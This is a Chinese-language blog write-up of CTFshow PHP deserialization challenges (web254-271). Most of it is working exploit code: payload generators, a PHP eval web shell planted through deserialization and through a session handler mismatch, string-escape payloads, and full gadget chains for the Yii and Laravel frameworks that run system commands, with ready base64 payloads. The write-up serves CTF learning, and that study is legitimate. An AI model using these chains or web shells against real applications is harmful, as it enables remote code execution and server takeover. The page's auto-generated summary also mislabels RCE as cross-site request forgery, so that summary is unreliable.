CTFSHOW(反序列化)

2301_80125214

已于 2024-03-24 09:23:24 修改

阅读量764

点赞数 19

文章标签： linux 数据库运维

于 2024-03-23 21:18:38 首次发布

本文链接：https://blog.csdn.net/2301_80125214/article/details/136851827

版权

文章详细探讨了PHP中的序列化漏洞利用，包括如何通过构造函数注入恶意代码、畸形序列化的处理、框架如Yii和Laravel的安全漏洞，以及利用session和cookie进行跨站请求伪造(RCE)攻击。

摘要由CSDN通过智能技术生成

web254

使用get传参?username=xxxxxx&password=xxxxxx

web255

<?php

class ctfShowUser{

public $username='xxxxxx';

public $password='xxxxxx';

public $isVip=true;

}

$a=new ctfShowUser();

echo urlencode(serialize($a));

?>

使用上述代码获得cookie值，进行传参

GET传参?username=xxxxxx&password=xxxxxx

cookie：user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

web256

username！=password时才会输出flag

<?php

class ctfShowUser{

public $username='xxxxxx';

public $password='xx';

public $isVip=true;

}

$a=new ctfShowUser();

echo urlencode(serialize($a));

?>

web257

找到在function getInfo中由执行命令的代码

<?php
class ctfShowUser{
private $class;
public function __construct(){
$this->class=new backDoor();
}
}
class backDoor{
private $code='system("cat f*");';
}
$b=new ctfShowUser();
echo urlencode(serialize($b));

web258

正则过滤[oc]是匹配o字符或者c字符，\d匹配一个数字字符，等价于[0-9]，+号是匹配前面的\d一次或者多次。只需要将O:变成O:+就可以绕过了

<?php

class ctfShowUser{

public $class;

public function __construct(){

$this->class=new backDoor();

}

}

class backDoor{

public $code="system('cat f*');";

}

$a=new ctfShowUser();

$b=serialize($a);

$b=str_replace("O:","O:+",$b);

echo urlencode($b);

?>

web260

get传参?ctfshow=ctfshow_i_love_36D

web261

如果类中同时定义了 __unserialize() 和 __wakeup() 两个魔术方法，则只有 __unserialize() 方法会生效，__wakeup() 方法会被忽略。

<?php
class ctfshowvip{
public $username;
public $password;

public function __construct(){
$this->username='877.php';
$this->password='<?php eval($_POST[1]);?>';
}
}
$a=new ctfshowvip();
echo urlencode(serialize($a));

访问877.php ?1=system('cat /f*');

web262

访问message.php

<?php
class message{
public $token='admin';
}
echo base64_encode(serialize(new message()));

字符串逃逸：

<?php
class message{
public $token='admin';
}
$a=new message();
echo serialize($a);

得到s:5:"token";s:5:"admin";}，进行闭合";s:5:"token";s:5:"admin";}

需要增加27个字符

?f=1&m=1&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck ";s:5:"token";s:5:"admin";}

再访问message.php

web263

php在session存储和读取时,都会有一个序列化和反序列化的过程,PHP内置了多种处理器用于存取$_SESSION数据,都会对数据序列化和反序列化,源码中有session_start的时候会读取session,从而进行反序列化.
php . ini 中默认 session.serialize_handler 为 php_serialize，而 index.php 中将其设置为 php ，这个差异就导致了 sesssion 反序列化问题。
php有三种处理器对$_SESSION数据进行序列化和反序列化。
php_binary 键名的长度对应的ascii字符+键名+经过serialize()函数序列化后的值
php 键名+竖线（|）+经过serialize()函数处理过的值
php_serialize 经过serialize()函数处理过的值，会将键名和值当作一个数组序列化

使用dirsearch进行扫描得到www.zip进行下载

在index.php中发现可以通过修改$COOKIE['limit']来控制seesion的内容

在check.php中发现require_once 'inc/inc.php';

进入inc.php

ini_set('session.serialize_handler', 'php');
session_start();

class User{
public $username;
public $password;
public $status;
function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}

$user=new User('10.php','<?php eval($_POST[1]);?>');
echo base64_encode(serialize($user));

首先访问index.php然后设置cookie中limit的值为|加上User类序列化之后的字符串的base64加密；然后再次访问index.php（并不是刷新），此时进入if语句将cookie的写入session文件中，内容为一句话。然后访问check.php或者inc/inc.php通过session_start()自动进行反序列化，执行写文件函数，最后访问写的文件，RCE。

web264

index.php

?f=&m=&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}

message.php

cookie:msg=任意

web265

存在md5加密，使用引用

<?php

class ctfshowAdmin{

public $token;

public $password;

public function __construct(){

$this->password=&$this->token;

}

}

$a=new ctfshowAdmin();

echo urlencode(serialize($a));

web266

可以使用大小写绕过

<?php
class ctfshow{
public $username='xxxxxx';
public $password='xxxxxx';
}
$a = new ctfshow（）;
echo urlencode(serialize($a));

O:7:"Ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}

利用php处理畸形的序列化的处理措施, 当php收到畸形的序列化时, 会因为对此序列化的不放心, 会第一时间处理掉它

O:7:"ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";

web267

是yii框架，默认账号密码是admin admin

登录后在about界面查看源码发现

拼接在url上

<?php
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;

public function __construct(){
$this->checkAccess = 'phpinfo';
$this->id = '1';
}
}
}

namespace Faker{
use yii\rest\CreateAction;

class Generator{
protected $formatters;

public function __construct(){
$this->formatters['close'] = [new CreateAction(), 'run'];
}
}
}

namespace yii\db{
use Faker\Generator;

class BatchQueryResult{
private $_dataReader;

public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>

TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NzoicGhwaW5mbyI7czoyOiJpZCI7czoxOiIxIjt9aToxO3M6MzoicnVuIjt9fX19

<?php
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;

public function __construct(){
$this->checkAccess = 'passthru';
$this->id = 'tac /flag';
}
}
}

namespace Faker{
use yii\rest\CreateAction;

class Generator{
protected $formatters;

public function __construct(){
$this->formatters['close'] = [new CreateAction(), 'run'];
}
}
}

namespace yii\db{
use Faker\Generator;

class BatchQueryResult{
private $_dataReader;

public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
echo base64_encode(serialize(new yii\db\BatchQueryResult));
}

?r=/backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6ODoicGFzc3RocnUiO3M6MjoiaWQiO3M6OToidGFjIC9mbGFnIjt9aToxO3M6MzoicnVuIjt9fX19

web268

存在过滤

<?php
namespace yii\rest {
class Action
{
public $checkAccess;
}
class IndexAction
{
public function __construct($func, $param)
{
$this->checkAccess = $func;
$this->id = $param;
}
}
}
namespace yii\web {
abstract class MultiFieldSession
{
public $writeCallback;
}
class DbSession extends MultiFieldSession
{
public function __construct($func, $param)
{
$this->writeCallback = [new \yii\rest\IndexAction($func, $param), "run"];
}
}
}
namespace yii\db {
use yii\base\BaseObject;
class BatchQueryResult
{
private $_dataReader;
public function __construct($func, $param)
{
$this->_dataReader = new \yii\web\DbSession($func, $param);
}
}
}
namespace {
$exp = new \yii\db\BatchQueryResult('shell_exec', 'cp /f* 1.txt'); //此处写命令
echo(base64_encode(serialize($exp)));
}

直接访问1.txt

web269

268的链子还可以用

web270

用之前的链子也可以

web271

用的是Laravel框架

<?php
namespace Illuminate\Foundation\Testing{

use Illuminate\Auth\GenericUser;
use Illuminate\Foundation\Application;

class PendingCommand
{
protected $command;
protected $parameters;
public $test;
protected $app;
public function __construct(){
$this->command="system";
$this->parameters[]="cat /flag";
$this->test=new GenericUser();
$this->app=new Application();
}
}
}
namespace Illuminate\Foundation{
class Application{
protected $bindings = [];
public function __construct(){
$this->bindings=array(
'Illuminate\Contracts\Console\Kernel'=>array(
'concrete'=>'Illuminate\Foundation\Application'
)
);
}
}
}
namespace Illuminate\Auth{
class GenericUser
{
protected $attributes;
public function __construct(){
$this->attributes['expectedOutput']=['hello','world'];
$this->attributes['expectedQuestions']=['hello','world'];
}
}
}
namespace{

use Illuminate\Foundation\Testing\PendingCommand;

echo urlencode(serialize(new PendingCommand()));
}